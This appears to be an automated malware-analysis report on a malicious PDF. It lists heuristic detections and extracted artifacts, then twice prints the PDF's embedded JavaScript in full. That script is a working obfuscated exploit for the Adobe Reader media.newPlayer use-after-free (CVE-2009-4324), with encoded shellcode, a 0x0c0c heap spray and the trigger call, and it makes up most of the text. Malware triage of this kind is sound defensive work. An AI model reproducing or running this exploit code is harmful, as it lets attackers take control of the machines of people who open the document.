Verdict: MALICIOUS
Risk Score: 220
Machine Learning
- Nyx PDF Classifier malicious score 0.9984
Heuristics (9)
- media.newPlayer — CVE-2009-4324 (critical; CVE exact; rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Obfuscated multi-stage PDF JavaScript heap-spray exploit (critical; rule PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY): PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Embedded file (low; rule PDF_EMBEDDED): PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
- Object number defined twice with different bodies (info; rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL): The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| k1 | pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 2041 bytes | d126f2ad4fc1902116e64aff7689cafa64a8efc447f950c255d916aa5935137f |
| javascript_obj0031_000.js | pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 4768 bytes | 24d7a1238d13b781894f738b03ea049c2bb3549b3ce9f8a727797def5b3aee46 |
Preview script (first 1,000 lines of the extracted script):
var QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN=unescape;
var PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x75a164\x25\x750030\x25\x750000\x25\x750005\x25\x750004\x25\x758b00\x25\x75ebf8%u5e14%udf8b%uc8b9\x25\x750000%ufc00\x25\x7535ad%uefef%uefef"+
"%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%ud206%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f"+
"%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364"+
"%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a\x25\x75f7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10"+
"%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4"+
"%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87"+
"%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u4337%u2cdd%u1145"+
"%u0d24%u8517%u62ef%u8faa%u10bf%ub39a%uba64\x25\x75bdd3%u9a10%u10a3%uf3ba%uba64%uc68f%ub7ba%u926c"+
"%uefb7%u5790%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0%u6525%ua0b4%u28ec"+
"%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511%u03e1%uec78%uefe3"+
"%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef"+
"%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u9bef%u828a%uc19f"+
"%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u5d07%u1011%u6410%u643f%u641a%u6411%u6c21"+
"%udf2e%u5a07%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10%ud2cb%u54ef%ueffd"+
"%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf%uef10%uefef%uba10"+
"%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85%uef87%ueff0%u10ef"+
"%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7%u85ef%u87ef%uf0ff"+
"%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87%uefef%u62af%u87aa"+
"%u6cbf%ufbaa%u04ea%u64e5%u641a\x25\x75ba10%u0364%u8910%u07fb%u101e%u1010%u6cb2%u1017%ued9a%ud604"+
"%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ubf07%u1011%uba10%u26dc"+
"%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e%u1010%u85b2%u85ef"+
"%u1010%uebba%u7f7f%u237f%uba23%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013%ue79a%ua307"+
"%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef%uaa64%u2617"+
"%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64%u2ee3%uff0f"+
"%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa%ubf62%u64ec"+
"\x25\x756cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f%uefef%ue99a"+
"%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf%u10ef\x25\x75efca"+
"\x25\x75afcf");
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768)QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var PoutyGBjgewDBjyteWESDgjeeDFG=null;
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
var TUOpbFEREfghrEWEDffdsdgyYY=Date;
for(i=0;i<0x1000;i++)
{
memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf;
}
var TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq=util;
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new TUOpbFEREfghrEWEDffdsdgyYY());
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new TUOpbFEREfghrEWEDffdsdgyYY());
var IJNytfcXSQAZxcgYYHBnJIKIreddfYUII=this;
try {IJNytfcXSQAZxcgYYHBnJIKIreddfYUII.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](PoutyGBjgewDBjyteWESDgjeeDFG);} catch(e) {}
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY,new Date());
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 | 4548 bytes | 0cd877e14ff21b7d8dd8b9709d2412c30c972542b8db176cdbfe62d4104a6113 |
Detection
ClamAV: No threats found
Obfuscation or payload: likely (14 of 20 identifiers look randomly generated, e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm' — consistent with name-mangling obfuscation).
Preview script (first 1,000 lines of the extracted script):
var QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN=unescape;
var PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("%ua164%u0030%u0000%u0005%u0004%u8b00%uebf8%u5e14%udf8b%uc8b9%u0000%ufc00%u35ad%uefef%uefef%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%ud206%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a%uf7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u4337%u2cdd%u1145%u0d24%u8517%u62ef%u8faa%u10bf%ub39a%uba64%ubdd3%u9a10%u10a3%uf3ba%uba64%uc68f%ub7ba%u926c%uefb7%u5790%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0%u6525%ua0b4%u28ec%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511%u03e1%uec78%uefe3%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u9bef%u828a%uc19f%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u5d07%u1011%u6410%u643f%u641a%u6411%u6c21%udf2e%u5a07%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10%ud2cb%u54ef%ueffd%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf%uef10%uefef%uba10%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85%uef87%ueff0%u10ef"+
"%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7%u85ef%u87ef%uf0ff%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87%uefef%u62af%u87aa%u6cbf%ufbaa%u04ea%u64e5%u641a%uba10%u0364%u8910%u07fb%u101e%u1010%u6cb2%u1017%ued9a%ud604%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ubf07%u1011%uba10%u26dc%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e%u1010%u85b2%u85ef%u1010%uebba%u7f7f%u237f%uba23%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013%ue79a%ua307%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef%uaa64%u2617%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64%u2ee3%uff0f%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa%ubf62%u64ec%u6cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f%uefef%ue99a%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf%u10ef%uefca%uafcf");
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768)QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var PoutyGBjgewDBjyteWESDgjeeDFG=null;
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
var TUOpbFEREfghrEWEDffdsdgyYY=Date;
for(i=0;i<0x1000;i++)
{
memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf;
}
var TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq=util;
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new TUOpbFEREfghrEWEDffdsdgyYY());
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new TUOpbFEREfghrEWEDffdsdgyYY());
var IJNytfcXSQAZxcgYYHBnJIKIreddfYUII=this;
try {IJNytfcXSQAZxcgYYHBnJIKIreddfYUII.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](PoutyGBjgewDBjyteWESDgjeeDFG);} catch(e) {}
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY,new Date());